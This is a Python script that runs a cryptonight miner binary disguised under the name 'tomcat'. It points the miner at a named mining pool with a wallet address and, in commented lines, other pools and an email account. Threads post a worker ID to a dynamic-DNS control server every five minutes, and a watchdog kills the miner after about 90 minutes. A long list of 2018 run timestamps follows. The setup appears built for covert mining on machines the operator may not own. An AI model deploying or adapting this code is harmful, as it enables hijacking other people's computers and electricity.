import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:03.324678
#2018-02-17 16:33:06.843166
#2018-02-17 18:21:06.286957
#2018-02-17 20:09:03.846632
#2018-02-17 21:55:08.442295
#2018-02-17 23:40:08.040608
#2018-02-18 01:31:07.032231
#2018-02-18 03:17:06.215999
#2018-02-18 05:06:04.901868
#2018-02-18 06:58:05.078559
#2018-02-18 08:47:06.122936
#2018-02-18 10:34:06.225234
#2018-02-18 12:19:04.029664
#2018-02-18 14:06:04.826958
#2018-02-18 15:55:01.796489
#2018-02-18 17:44:05.392425
#2018-02-18 19:31:01.464666
#2018-02-18 21:16:01.454134
#2018-02-18 23:03:04.943367
#2018-02-19 00:50:01.593105
#2018-02-19 02:37:04.421186
#2018-02-19 04:23:07.557977
#2018-02-19 06:08:05.582077
#2018-02-19 07:56:01.802568
#2018-02-19 09:47:07.608799
#2018-02-19 11:35:08.039022
#2018-02-19 13:22:08.455369
#2018-02-19 15:11:01.464177
#2018-02-19 16:58:02.087240
#2018-02-19 18:44:08.535600
#2018-02-19 20:33:02.114497
#2018-02-19 22:19:01.836090
#2018-02-20 00:04:08.394644
#2018-02-20 01:52:05.087005
#2018-02-20 03:40:04.823583
#2018-02-20 05:26:01.836046
#2018-02-20 07:10:04.558518
#2018-02-20 08:55:06.044320
#2018-02-20 10:39:06.570010
#2018-02-20 12:25:02.011030
#2018-02-20 14:11:04.797806
#2018-02-20 15:54:08.818691
#2018-02-20 17:42:05.878826
#2018-02-20 19:32:04.830102
#2018-02-20 21:18:08.322706
#2018-02-20 23:02:06.218617
#2018-02-21 00:46:06.224323
#2018-02-21 02:32:05.131156
#2018-02-21 04:19:07.503312
#2018-02-21 06:07:05.447491
#2018-02-21 07:53:06.268417
#2018-02-21 09:39:03.930121
#2018-02-21 11:27:06.930927
#2018-02-21 13:16:04.935814
#2018-02-21 15:02:07.169627
#2018-02-21 16:51:06.207925
#2018-02-21 18:40:07.796921
#2018-02-21 20:24:06.299182
#2018-02-21 22:11:06.246950
#2018-02-22 00:02:07.954540
#2018-02-22 01:50:09.837805
#2018-02-22 03:37:01.592044
#2018-02-22 05:24:07.804531
#2018-02-22 07:09:01.506907
#2018-02-22 08:55:04.184873
#2018-02-22 10:43:06.680785
#2018-02-22 12:29:05.605071
#2018-02-22 14:13:04.348768
#2018-02-22 16:01:09.087743
#2018-02-22 17:48:07.924422
#2018-02-22 19:35:04.766225
#2018-02-22 21:26:06.788522
#2018-02-22 23:14:05.745345
#2018-02-23 00:59:06.566741
#2018-02-23 02:48:01.888647
#2018-02-23 04:35:07.090287
#2018-02-23 06:21:04.093503
#2018-02-23 08:08:05.419906
#2018-02-23 10:21:04.381901
#2018-02-23 12:13:04.189968
#2018-02-23 13:59:08.009000
#2018-02-23 15:52:01.861132
#2018-02-23 17:37:06.886957
#2018-02-23 19:23:05.893030
#2018-02-23 21:07:07.392150
#2018-02-23 22:53:01.251924
#2018-02-24 00:40:05.491618
#2018-02-24 02:31:04.873521
#2018-02-24 04:25:04.017265
#2018-02-24 06:10:07.688907
#2018-02-24 07:57:06.557363
#2018-02-24 09:42:07.219624
#2018-02-24 11:38:01.762446
#2018-02-24 13:28:05.618104
#2018-02-24 15:17:07.432633
#2018-02-24 17:06:04.079343
#2018-02-24 18:57:07.268429
#2018-02-24 20:44:03.961108
#2018-02-25 01:15:02.073094
#2018-02-25 05:09:05.776456
#2018-02-25 10:29:01.360088